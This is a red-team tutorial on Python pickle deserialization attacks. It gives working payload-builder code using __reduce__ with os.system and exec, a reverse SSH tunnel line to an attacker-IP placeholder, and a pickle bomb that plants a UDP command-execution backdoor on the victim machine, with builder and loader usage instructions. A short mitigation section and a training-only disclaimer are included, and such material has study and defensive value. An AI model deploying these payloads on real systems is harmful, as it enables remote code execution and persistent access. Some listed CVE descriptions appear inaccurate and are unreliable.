Python Deserialization Attack Introduction: How to Build a Python Pickle Bomb

This article introduces an old and classic unsecured Python data serialization feature (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:

We will follow 3 steps with the program code to show how Deserialization Attacks Work:

[ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process has in the incoming data.
[ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
[ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.

Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.

# Created:     2024/07/06
# Version:     v0.1.1
# Copyright:   Copyright (c) 2024 LiuYuancheng
# License:     MIT License

Introduction

Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. There are several Common Vulnerabilities and Exploits (CVEs) related the Python pickle Deserialization Vulnerabilities:

CVE-2011-3389: Untrusted data passed to pickle deserialization can execute arbitrary code.
CVE-2019-5021: The pickle module in Python is vulnerable to arbitrary code execution due to unsafe deserialization.
CVE-2018-1000802: A deserialization vulnerability in the pickle module can be exploited to execute arbitrary code.
CVE-2019-9636: Insecure loading of a pickle-based format in the Pandas library can lead to arbitrary code execution.
CVE-2019-20907: Improper handling of serialized data leading to potential arbitrary code execution.
CVE-2024-34997: critical deserialization vulnerability identified in joblib version 1.4.2, specifically in the NumpyArrayWrapper().read_array() component within the joblib.numpy_pickle module.

Introduction of Python Data Serialization

In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:

# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': set(['CT100', 'COM3', 3])  # set data is not support by json
    }
})

For such complex data objects, formats like JSON, YAML, or XML are not suitable. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).

import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)

Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The object can be dump and load are shown below:

This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.

Introduction of Python Deserialization Vulnerabilities

While using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk:

The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:

The __reduce__() function can return an executable function along with related parameters. When the data is deserialized, the function will be executed. Here is an example of a simple serialized data loader that can load both binary and text format data:

# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
    choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
    if choice == '1':
        orignalData = None
        with open('data.pkl', 'rb') as fh:
            orignalData = pickle.load(fh)
        print(orignalData)
    elif choice == '2':
        dataStr = None
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        orignalData = pickle.loads(base64.b64decode(dataStr))
        print(orignalData)
    else:
        print("Exit....")
        exit()

Link to download Full Pickled data load program(pickleBombLoader.py)

To build a simple Python pickle bomb, we can over write the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:

import os
import pickle
import base64

# a simple picle bomb to run command
class PickleCmd:
    def __reduce__(self):
        cmd = ('uname -a')
        return os.system, (cmd,)    
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

When we run this script, it will create two data files: a binary data file (data.pkl) and a text data file (data.txt). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:

With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.

Build Python Pickle Boom

In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.

Clarification on Command Execution

Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:

class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)

If we reload the new pickle bomb, you can see that the additional commands are not executed:

Only the function returned by __reduce__() is executed. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse shell command. For example:

cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')

However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.

Improving the Pickle Bomb Program

Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:

import pickle
import base64

codeContent="""
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# a simple picle bomb to run command
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
    
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

After loading the data file, you will see that the Python code to create a file is executed:

By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.

Building a More Complex Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.

Here is the UDP server program:

# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096 
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
    data, address = udpServer.recvfrom(BUFFER_SZ)
    cmdMsg = data.decode('utf-8')
    if cmdMsg == '': continue
    if cmdMsg == 'exit': exit()
    result = 'Command not found!'
    try:
        result = subprocess.check_output(cmdMsg, shell=True).decode()
    except Exception as err:
        result = str(err)
    udpServer.sendto(result.encode('utf-8'), address)

Link to download UDP command execution server program(udpCmdServer.py)

Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:

# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64

# Serilized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None 
with open(fileName, 'r') as fh:
    dataStr = fh.read()

class PickleBomb:
    def __reduce__(self):
        pass
        return exec, (dataStr,)

obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

Link to download Full Pickle Bomb Builder Program (pickleBombBuilder.py)

Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:

We can then use a simple UDP client program to connect to the victim's IP address and run commands:

Link to download Full UDP client program (udpCom.py)

As shown, we can check the folder structure and network information of the victim.

Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.

Demo Setup and Execution

For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:

https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb

Development/Execution Environment

python 3.7.4+

Additional Lib/Software Need : N.A

Program Files List

Program File	Execution Env	Description
pickleBombBuilder.py	python 3	Program to covert a executable python program to a byte/text format serialized data file ( pickle bomb file) .
pickleBombLoader.py	python 3	Program to demo load the byte or text format serialized data and triggered the pickle bomb.
simplepickleCmdRun.py	python 3	A simple execution command pickle bomb create script.
simplepickleCodeRun.py	python 3	A simple python code pickle bomb create script.
udpCmdServer.py	python 3	A normal UDP server host on port 3000 accept different UDP client connection
udpCom.py	python 3	A UDP communication lib provide the UDP client program.
data.txt		Text format pickle bomb file
data.pkl		Bytes format pickle bomb file

For the below section to create and demo the Python deserialization attack

Run the pickle bomb builder

Copy the python execution file ( for example udpCmdServer.py ) with the same folder of the pickleBombBuilder.py, run the build with cmd:

python pickleBombBuilder.py -f udpCmdServer.py
    -c : build cmd bomb: python pickleBombBuilder.py -c <Command string>
    -f : build code bomb: python pickleBombBuilder.py -f <Python program file name>
    -h : help

Then the bytes format pickle bomb data.pkl and text format pickle bomb file data.txt will be created.

Run the pickle bomb loader

Copy the pickle file you want to deserialize in the same folder then run the loader:

python pickleBombLoader.py

Connect to the UDP command execution server

When the UDP command exaction server pickle bomb activated, run the UDP Communication module and select the UDP client function, then input the victim IP address and port 3000. After connected, type in the command and the command will be sent to the pickle bomb and the execution result will be retrieved and show on the client.

python udpCom.py

Mitigations of Python Deserialization Attack

To avoid the Python Deserialization Attack happen, there are several points we can follow:

Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.

Conclusion and Reference

Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.

Reference: